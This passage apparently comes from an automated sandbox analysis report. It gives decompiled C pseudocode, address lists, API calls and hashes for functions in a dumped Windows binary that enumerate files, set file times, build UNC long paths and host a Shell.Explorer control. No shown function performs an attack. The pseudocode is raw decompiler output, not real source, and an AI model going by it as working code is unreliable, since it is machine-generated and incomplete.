							_t190 = _v16;
							_v8 = _t157;
							_t150 = _v336.cAlternateFileName;
						}
						_t210 = E00216F0C(_t190, _v8, 1);
						_t224 = _t223 + 0xc;
						__eflags = _t210;
						if(_t210 != 0) {
							_t87 = _t210 + _v16 * 4;
							_v20 = _t87;
							_t191 = _t87;
							_v16 = _t87;
							__eflags = _t198 - _t150;
							if(_t198 == _t150) {
								L23:
								_t199 = 0;
								__eflags = 0;
								 *_a8 = _t210;
								goto L24;
							} else {
								_t93 = _t210 - _t198;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t162 =  *_t198;
									_v12 = _t162 + 1;
									do {
										_t95 =  *_t162;
										_t162 = _t162 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t163 = _t162 - _v12;
									_t35 = _t163 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E0021DD71(_t163, _t191, _v20 - _t191 + _v8,  *_t198);
									_t224 = _t224 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00217DBB();
										asm("int3");
										_t220 = _t224;
										_push(_t163);
										_t164 = _v64;
										_t47 = _t164 + 1; // 0x1
										_t192 = _t47;
										do {
											_t103 =  *_t164;
											_t164 = _t164 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t198);
										_t201 = _a8;
										_t166 = _t164 - _t192 + 1;
										_v12 = _t166;
										__eflags = _t166 - (_t103 | 0xffffffff) - _t201;
										if(_t166 <= (_t103 | 0xffffffff) - _t201) {
											_push(_t150);
											_t50 = _t201 + 1; // 0x1
											_t153 = _t50 + _t166;
											_t212 = E00217B1B(_t166, _t153, 1);
											_t168 = _t210;
											__eflags = _t201;
											if(_t201 == 0) {
												L34:
												_push(_v12);
												_t153 = _t153 - _t201;
												_t108 = E0021DD71(_t168, _t212 + _t201, _t153, _v0);
												_t225 = _t224 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t136 = E0021A212(_a12, _t192, __eflags, _t212);
													E00217A50(0);
													_t138 = _t136;
													goto L36;
												}
											} else {
												_push(_t201);
												_t139 = E0021DD71(_t168, _t212, _t153, _a4);
												_t225 = _t224 + 0x10;
												__eflags = _t139;
												if(_t139 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00217DBB();
													asm("int3");
													_push(_t220);
													_t221 = _t225;
													_t226 = _t225 - 0x150;
													_t111 =  *0x22d668; // 0x4319796a
													_v116 = _t111 ^ _t221;
													_t169 = _v100;
													_push(_t153);
													_t154 = _v104;
													_push(_t212);
													_t213 = _v96;
													_push(_t201);
													_v440 = _t213;
													while(1) {
														__eflags = _t169 - _t154;
														if(_t169 == _t154) {
															break;
														}
														_t113 =  *_t169;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t169 = E0021DDC0(_t154, _t169);
																	continue;
																}
															}
														}
														break;
													}
													_t193 =  *_t169;
													__eflags = _t193 - 0x3a;
													if(_t193 != 0x3a) {
														L47:
														_t202 = 0;
														__eflags = _t193 - 0x2f;
														if(_t193 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t193 - 0x5c;
															if(_t193 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t193 - 0x3a;
																if(_t193 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
														E0020E920(_t202,  &_v336, _t202, 0x140);
														_t227 = _t226 + 0xc;
														_t214 = FindFirstFileExA(_t154, _t202,  &_v336, _t202, _t202, _t202);
														_t123 = _v340;
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t173;
															_v348 = _t173 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t154);
																	_push(_t123);
																	L28();
																	_t227 = _t227 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t177 = _v291;
																	__eflags = _t177;
																	if(_t177 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t177 - 0x2e;
																		if(_t177 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t214,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t194 =  *_t123;
															_t178 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t178 - _t131;
															if(_t178 != _t131) {
																E00215030(_t154, _t202, _t214, _t194 + _t178 * 4, _t131 - _t178, 4, E00219E2B);
															}
														} else {
															_push(_t123);
															_push(_t202);
															_push(_t202);
															_push(_t154);
															L28();
															L54:
															_t202 = _t123;
														}
														__eflags = _t214 - 0xffffffff;
														if(_t214 != 0xffffffff) {
															FindClose(_t214);
														}
														_t124 = _t202;
													} else {
														_t124 =  &(_t154[1]);
														__eflags = _t169 -  &(_t154[1]);
														if(_t169 ==  &(_t154[1])) {
															goto L47;
														} else {
															_push(_t213);
															_push(0);
															_push(0);
															_push(_t154);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t221;
													return E0020E203(_t124, _v16 ^ _t221);
												} else {
													goto L34;
												}
											}
										} else {
											_t138 = 0xc;
											L36:
											return _t138;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t195 = _v16;
									 *((intOrPtr*)(_v24 + _t198)) = _t195;
									_t198 = _t198 + 4;
									_t191 = _t195 + _v12;
									_v16 = _t195 + _v12;
									__eflags = _t198 - _t150;
								} while (_t198 != _t150);
								goto L23;
							}
						} else {
							_t199 = _t198 | 0xffffffff;
							L24:
							E00217A50(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t159;
							_t146 = E0021DD80( *_t207,  &_v8);
							__eflags = _t146;
							if(_t146 != 0) {
								_push( &_v36);
								_push(_t146);
								_push( *_t207);
								L38();
								_t223 = _t223 + 0xc;
							} else {
								_t146 =  &_v36;
								_push(_t146);
								_push(0);
								_push(0);
								_push( *_t207);
								L28();
								_t223 = _t223 + 0x10;
							}
							_t199 = _t146;
							__eflags = _t199;
							if(_t199 != 0) {
								break;
							}
							_t207 = _t207 + 4;
							_t159 = 0;
							__eflags =  *_t207;
							if( *_t207 != 0) {
								continue;
							} else {
								_t150 = _v336.cAlternateFileName;
								_t198 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E0021A1ED( &_v36);
						_t91 = _t199;
						goto L26;
					}
				} else {
					_t147 = E00217ECC();
					_t218 = 0x16;
					 *_t147 = _t218;
					E00217DAB();
					_t91 = _t218;
					L26:
					return _t91;
				}
				L68:
			}





















































































          0x00219e48
          0x00219e4b
          0x00219e51
          0x00219e69
          0x00219e6c
          0x00219e70
          0x00219e72
          0x00219e74
          0x00219e76
          0x00219e79
          0x00219e7c
          0x00219e7f
          0x00219e81
          0x00219ed9
          0x00219ed9
          0x00219edf
          0x00219ee1
          0x00219eec
          0x00219ef0
          0x00219ef2
          0x00219ef5
          0x00219ef9
          0x00219ef9
          0x00219efb
          0x00219efd
          0x00219eff
          0x00219f01
          0x00219f01
          0x00219f03
          0x00219f06
          0x00219f09
          0x00219f09
          0x00219f0b
          0x00219f0c
          0x00219f0c
          0x00219f17
          0x00219f19
          0x00219f1c
          0x00219f1d
          0x00219f20
          0x00219f20
          0x00219f24
          0x00219f27
          0x00219f2a
          0x00219f2a
          0x00219f38
          0x00219f3a
          0x00219f3d
          0x00219f3f
          0x00219f49
          0x00219f4c
          0x00219f4f
          0x00219f51
          0x00219f54
          0x00219f56
          0x00219fa6
          0x00219fa9
          0x00219fa9
          0x00219fab
          0x00000000
          0x00219f58
          0x00219f5a
          0x00219f5a
          0x00219f5c
          0x00219f5f
          0x00219f5f
          0x00219f64
          0x00219f67
          0x00219f67
          0x00219f69
          0x00219f6a
          0x00219f6a
          0x00219f6e
          0x00219f71
          0x00219f71
          0x00219f74
          0x00219f77
          0x00219f84
          0x00219f89
          0x00219f8c
          0x00219f8e
          0x00219fc8
          0x00219fc9
          0x00219fca
          0x00219fcb
          0x00219fcc
          0x00219fcd
          0x00219fd2
          0x00219fd6
          0x00219fd8
          0x00219fd9
          0x00219fdc
          0x00219fdc
          0x00219fdf
          0x00219fdf
          0x00219fe1
          0x00219fe2
          0x00219fe2
          0x00219feb
          0x00219fec
          0x00219fef
          0x00219ff2
          0x00219ff5
          0x00219ff7
          0x00219ffe
          0x0021a000
          0x0021a003
          0x0021a00d
          0x0021a010
          0x0021a011
          0x0021a013
          0x0021a027
          0x0021a027
          0x0021a02a
          0x0021a034
          0x0021a039
          0x0021a03c
          0x0021a03e
          0x00000000
          0x0021a040
          0x0021a044
          0x0021a04d
          0x0021a053
          0x00000000
          0x0021a056
          0x0021a015
          0x0021a015
          0x0021a01b
          0x0021a020
          0x0021a023
          0x0021a025
          0x0021a05c
          0x0021a05e
          0x0021a05f
          0x0021a060
          0x0021a061
          0x0021a062
          0x0021a063
          0x0021a068
          0x0021a06b
          0x0021a06c
          0x0021a06e
          0x0021a074
          0x0021a07b
          0x0021a07e
          0x0021a081
          0x0021a082
          0x0021a085
          0x0021a086
          0x0021a089
          0x0021a08a
          0x0021a0ab
          0x0021a0ab
          0x0021a0ad
          0x00000000
          0x00000000
          0x0021a092
          0x0021a094
          0x0021a096
          0x0021a098
          0x0021a09a
          0x0021a09c
          0x0021a09e
          0x0021a0a9
          0x00000000
          0x0021a0a9
          0x0021a09e
          0x0021a09a
          0x00000000
          0x0021a096
          0x0021a0af
          0x0021a0b1
          0x0021a0b4
          0x0021a0cd
          0x0021a0cd
          0x0021a0cf
          0x0021a0d2
          0x0021a0e2
          0x0021a0e4
          0x0021a0e4
          0x0021a0d4
          0x0021a0d4
          0x0021a0d7
          0x00000000
          0x0021a0d9
          0x0021a0d9
          0x0021a0dc
          0x00000000
          0x0021a0de
          0x0021a0de
          0x0021a0de
          0x0021a0dc
          0x0021a0d7
          0x0021a0f2
          0x0021a0f6
          0x0021a104
          0x0021a109
          0x0021a11e
          0x0021a120
          0x0021a126
          0x0021a129
          0x0021a15b
          0x0021a15b
          0x0021a160
          0x0021a166
          0x0021a166
          0x0021a16d
          0x0021a187
          0x0021a187
          0x0021a188
          0x0021a18e
          0x0021a194
          0x0021a195
          0x0021a196
          0x0021a19b
          0x0021a19e
          0x0021a1a0
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0021a16f
          0x0021a16f
          0x0021a175
          0x0021a177
          0x00000000
          0x0021a179
          0x0021a179
          0x0021a17c
          0x00000000
          0x0021a17e
          0x0021a17e
          0x0021a185
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x0021a185
          0x0021a17c
          0x0021a177
          0x00000000
          0x0021a1a2
          0x0021a1aa
          0x0021a1b0
          0x0021a1b2
          0x0021a1b2
          0x0021a1ba
          0x0021a1bf
          0x0021a1c7
          0x0021a1ca
          0x0021a1cc
          0x0021a1e0
          0x0021a1e5
          0x0021a12b
          0x0021a12b
          0x0021a12c
          0x0021a12d
          0x0021a12e
          0x0021a12f
          0x0021a137
          0x0021a137
          0x0021a137
          0x0021a139
          0x0021a13c
          0x0021a13f
          0x0021a13f
          0x0021a145
          0x0021a0b6
          0x0021a0b6
          0x0021a0b9
          0x0021a0bb
          0x00000000
          0x0021a0bd
          0x0021a0bd
          0x0021a0c0
          0x0021a0c1
          0x0021a0c2
          0x0021a0c3
          0x0021a0c8
          0x0021a0bb
          0x0021a147
          0x0021a14c
          0x0021a157
          0x00000000
          0x00000000
          0x00000000
          0x0021a025
          0x00219ff9
          0x00219ffb
          0x0021a057
          0x0021a05b
          0x0021a05b
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00219f90
          0x00219f93
          0x00219f96
          0x00219f99
          0x00219f9c
          0x00219f9f
          0x00219fa2
          0x00219fa2
          0x00000000
          0x00219f5f
          0x00219f41
          0x00219f41
          0x00219fad
          0x00219faf
          0x00000000
          0x00219fb4
          0x00219e83
          0x00219e83
          0x00219e86
          0x00219e8f
          0x00219e92
          0x00219e99
          0x00219e9b
          0x00219eb4
          0x00219eb5
          0x00219eb6
          0x00219eb8
          0x00219ebd
          0x00219e9d
          0x00219e9d
          0x00219ea0
          0x00219ea1
          0x00219ea3
          0x00219ea5
          0x00219ea7
          0x00219eac
          0x00219eac
          0x00219ec0
          0x00219ec2
          0x00219ec4
          0x00000000
          0x00000000
          0x00219eca
          0x00219ecd
          0x00219ecf
          0x00219ed1
          0x00000000
          0x00219ed3
          0x00219ed3
          0x00219ed6
          0x00000000
          0x00219ed6
          0x00000000
          0x00219ed1
          0x00219fb5
          0x00219fb8
          0x00219fbd
          0x00000000
          0x00219fc0
          0x00219e53
          0x00219e53
          0x00219e5a
          0x00219e5b
          0x00219e5d
          0x00219e62
          0x00219fc1
          0x00219fc5
          0x00219fc5
          0x00000000

          APIs
          • _free.LIBCMT ref: 00219FAF
            • Part of subcall function 00217DBB: IsProcessorFeaturePresent.KERNEL32(00000017,00217DAA,0000002C,0022A968,0021AF68,00000000,00000000,00218599,?,?,00217DB7,00000000,00000000,00000000,00000000,00000000), ref: 00217DBD
            • Part of subcall function 00217DBB: GetCurrentProcess.KERNEL32(C0000417,0022A968,0000002C,00217AE8,00000016,00218599), ref: 00217DDF
            • Part of subcall function 00217DBB: TerminateProcess.KERNEL32(00000000), ref: 00217DE6
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
          • String ID: *?$.
          • API String ID: 2667617558-3972193922
          • Opcode ID: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
          • Instruction ID: 7fa99923dda06a75c407c81f97f7b4ea4f0d7e8ad6d4550565231e2a8fa5e65f
          • Opcode Fuzzy Hash: 94f8a64fa80366221982f68d4a3b181e271fc585eb11c879034c7e578db89a15
          • Instruction Fuzzy Hash: 0E51B575E1020AAFDF14CFA8C881AEDB7F5FFA8310F244169E454E7741E6719E928B50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F7570, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
          Download Yara Rule
          C-Code - Quality: 80%
          			E001F7570(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E0020D870(E00221298, _t108);
				E0020D940();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E001FFAB1(_t108 - 0x1010, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E001F7773(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x407c, 0x800);
					_t113 =  *((short*)(_t108 - 0x407c)) - 0x3a;
					if( *((short*)(_t108 - 0x407c)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E001FFA89(__eflags, _t108 - 0x1010, _t108 - 0x407c, _t101);
							E001F6EF9(_t108 - 0x307c);
							_push(0);
							_t54 = E001FA1B1(_t108 - 0x307c, _t99, __eflags, _t106, _t108 - 0x307c);
							_t85 =  *(_t108 - 0x2074);
							 *((char*)(_t108 + 0x13)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E001FA12F(_t106, _t85 & 0xfffffffe);
							}
							E001F943C(_t108 - 0x2034);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E001F9BE6(_t108 - 0x2034, __eflags, _t108 - 0x1010, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x2034);
								_push(0);
								_t68 = E001F399D(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E001F94DA(_t108 - 0x2034);
								}
							}
							E001F943C(_t108 - 0x50a0);
							__eflags =  *((char*)(_t108 + 0x13));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 + 0x13)) != 0) {
								_t62 = E001F9768(_t108 - 0x50a0, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x509c), _t108 - 0x2054, _t108 - 0x204c, _t108 - 0x2044);
								}
							}
							E001FA12F(_t106,  *(_t108 - 0x2074));
							E001F946E(_t108 - 0x50a0);
							_t90 = _t108 - 0x2034;
						} else {
							E001F943C(_t108 - 0x60c4);
							_push(1);
							_push(_t108 - 0x60c4);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E001F399D(_t81, _t99);
							_t90 = _t108 - 0x60c4;
						}
						_t61 = E001F946E(_t90);
					} else {
						E001F6BF5(_t113, 0x53, _t81 + 0x1e, _t106);
						_t61 = E001F6E03(0x2300e0, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E001FFAB1(_t108 - 0x1010, 0x222490, 0x802);
					E001FFA89(_t112, _t108 - 0x1010, _t106, 0x802);
					goto L4;
				}
			}















          0x001f7570
          0x001f7575
          0x001f757f
          0x001f7586
          0x001f758f
          0x001f75be
          0x001f75be
          0x001f75cc
          0x001f75d1
          0x001f75d1
          0x001f75e1
          0x001f75e6
          0x001f75ee
          0x001f760d
          0x001f7611
          0x001f764e
          0x001f7659
          0x001f7666
          0x001f7669
          0x001f766e
          0x001f7674
          0x001f7677
          0x001f767a
          0x001f767c
          0x001f7681
          0x001f7681
          0x001f768c
          0x001f7699
          0x001f76a7
          0x001f76ac
          0x001f76ae
          0x001f76b0
          0x001f76b9
          0x001f76ba
          0x001f76bb
          0x001f76c0
          0x001f76c2
          0x001f76ca
          0x001f76ca
          0x001f76c2
          0x001f76d5
          0x001f76da
          0x001f76de
          0x001f76e2
          0x001f76ed
          0x001f76f2
          0x001f76f4
          0x001f7711
          0x001f7711
          0x001f76f4
          0x001f771e
          0x001f7729
          0x001f772e
          0x001f7613
          0x001f7619
          0x001f761e
          0x001f7628
          0x001f7629
          0x001f762c
          0x001f762f
          0x001f7634
          0x001f7634
          0x001f7734
          0x001f75f0
          0x001f75f7
          0x001f7603
          0x001f7603
          0x001f773f
          0x001f7749
          0x001f7749
          0x001f7591
          0x001f7595
          0x00000000
          0x001f7597
          0x001f7597
          0x001f75a9
          0x001f75b7
          0x00000000
          0x001f75b7

          APIs
          • __EH_prolog.LIBCMT ref: 001F7575
          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001F7711
            • Part of subcall function 001FA12F: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001F9F65,?,?,?,001F9DFE,?,00000001,00000000,?,?), ref: 001FA143
            • Part of subcall function 001FA12F: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001F9F65,?,?,?,001F9DFE,?,00000001,00000000,?,?), ref: 001FA174
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: File$Attributes$H_prologTime
          • String ID: :
          • API String ID: 1861295151-336475711
          • Opcode ID: 86206cc83100b51a9b8691352df07e822cba538373486a3d2254a06a8911aa92
          • Instruction ID: ef9db526174b40e023a5828a9727302f5151bd4f84cdf6387f738c92602e94a1
          • Opcode Fuzzy Hash: 86206cc83100b51a9b8691352df07e822cba538373486a3d2254a06a8911aa92
          • Instruction Fuzzy Hash: 394190B180521CAADB25EB64DD59EFE737CAF64300F4041A9B709A3092DB745F89CFA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FB32C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
          Download Yara Rule
          C-Code - Quality: 81%
          			E001FB32C(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E0020D940();
				_t71 = _a4;
				if( *_t71 != 0) {
					E001FB4C6(_t71);
					_t66 = E00212B33(_t71);
					_t30 = E001FB4F2(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E001FB5CD( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E001FAEA5(__eflags,  &_v4100, 0x800);
							_t39 = E00212B33( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E001FFAB1(_a8, L"\\\\?\\", _t69);
							E001FFA89(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E001FB5CD(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E001FFA89(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E001FFAB1(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E001FFA89(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E001FB4C6(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E001FFAB1(_a8, L"\\\\?\\", _t73);
						E001FFA89(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E001FFAB1(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}
















          0x001fb334
          0x001fb33a
          0x001fb341
          0x001fb34d
          0x001fb35a
          0x001fb35c
          0x001fb361
          0x001fb363
          0x001fb3e9
          0x001fb3ef
          0x001fb3f1
          0x001fb4b0
          0x001fb4b0
          0x001fb4b0
          0x001fb4b2
          0x00000000
          0x001fb4b3
          0x001fb3f7
          0x001fb3f9
          0x00000000
          0x00000000
          0x001fb408
          0x001fb40a
          0x001fb44f
          0x001fb45b
          0x001fb465
          0x001fb469
          0x001fb46b
          0x00000000
          0x00000000
          0x001fb476
          0x001fb486
          0x001fb48b
          0x001fb48f
          0x001fb49b
          0x001fb49d
          0x001fb49f
          0x001fb49f
          0x001fb49f
          0x001fb49d
          0x001fb4a2
          0x001fb4a2
          0x001fb4a3
          0x001fb4a3
          0x001fb4a4
          0x001fb4a4
          0x001fb4a7
          0x001fb4ac
          0x00000000
          0x001fb4ac
          0x001fb40c
          0x001fb40f
          0x001fb412
          0x001fb414
          0x00000000
          0x00000000
          0x001fb423
          0x001fb42a
          0x001fb43c
          0x00000000
          0x001fb43c
          0x001fb366
          0x001fb36b
          0x001fb36d
          0x001fb395
          0x001fb396
          0x001fb399
          0x00000000
          0x00000000
          0x001fb39f
          0x001fb3a2
          0x001fb3a5
          0x00000000
          0x00000000
          0x001fb3ab
          0x001fb3ae
          0x001fb3b1
          0x001fb3b3
          0x00000000
          0x00000000
          0x001fb3c2
          0x001fb3d0
          0x001fb3d5
          0x001fb3d6
          0x00000000
          0x001fb3d6
          0x001fb36f
          0x001fb372
          0x001fb375
          0x00000000
          0x00000000
          0x001fb386
          0x001fb38b
          0x00000000
          0x001fb343
          0x001fb343
          0x001fb4b4
          0x001fb4b8
          0x001fb4b8

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID: UNC$\\?\
          • API String ID: 0-253988292
          • Opcode ID: ccb6bde474b463f357084d3c401e3c354dd91654fadac3e07582990282b0a3b7
          • Instruction ID: 952a2ea85fe6024644f71142fa70d04b8f27e53c4cfbf26d136b5849adda17f4
          • Opcode Fuzzy Hash: ccb6bde474b463f357084d3c401e3c354dd91654fadac3e07582990282b0a3b7
          • Instruction Fuzzy Hash: 1E41E33140821CBACF21AF60DD81EFB37ADAF15355F048465FB1993242D7B49AA5DBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00208A07, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
          Download Yara Rule
          C-Code - Quality: 70%
          			E00208A07(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				void* __esi;
				intOrPtr _t18;
				char _t19;
				intOrPtr* _t23;
				signed int _t25;
				void* _t26;
				intOrPtr* _t28;
				void* _t38;
				void* _t43;
				intOrPtr _t44;
				signed int* _t48;

				_t44 = _a4;
				_t43 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _t44;
				_t18 = E0020D82C(__edx, _t44, __eflags, 0x30);
				_a4 = _t18;
				if(_t18 == 0) {
					_t19 = 0;
					__eflags = 0;
				} else {
					_t19 = E002083B5(_t18);
				}
				 *((intOrPtr*)(_t43 + 0xc)) = _t19;
				if(_t19 == 0) {
					return _t19;
				} else {
					 *((intOrPtr*)(_t19 + 0x18)) = _t44;
					E00209184( *((intOrPtr*)(_t43 + 0xc)), L"Shell.Explorer");
					E0020931D( *((intOrPtr*)(_t43 + 0xc)), 1);
					E002092D3( *((intOrPtr*)(_t43 + 0xc)), 1);
					_t23 = E00209238( *((intOrPtr*)(_t43 + 0xc)));
					_t28 = _t23;
					if(_t28 == 0) {
						L7:
						__eflags =  *(_t43 + 0x10);
						if( *(_t43 + 0x10) != 0) {
							E00208581(_t43);
							_t25 =  *(_t43 + 0x10);
							_push(0);
							_push(0);
							_push(0);
							 *((char*)(_t43 + 0x25)) = 0;
							_t38 =  *_t25;
							_push(0);
							__eflags =  *(_t43 + 0x20);
							if( *(_t43 + 0x20) == 0) {
								_push(L"about:blank");
							} else {
								_push( *(_t43 + 0x20));
							}
							_t23 =  *((intOrPtr*)(_t38 + 0x2c))(_t25);
						}
						L12:
						return _t23;
					}
					_t10 = _t43 + 0x10; // 0x10
					_t48 = _t10;
					_t26 =  *((intOrPtr*)( *_t28))(_t28, 0x22412c, _t48);
					_t23 =  *((intOrPtr*)( *_t28 + 8))(_t28);
					if(_t26 >= 0) {
						goto L7;
					}
					 *_t48 =  *_t48 & 0x00000000;
					goto L12;
				}
			}














          0x00208a08
          0x00208a0d
          0x00208a11
          0x00208a14
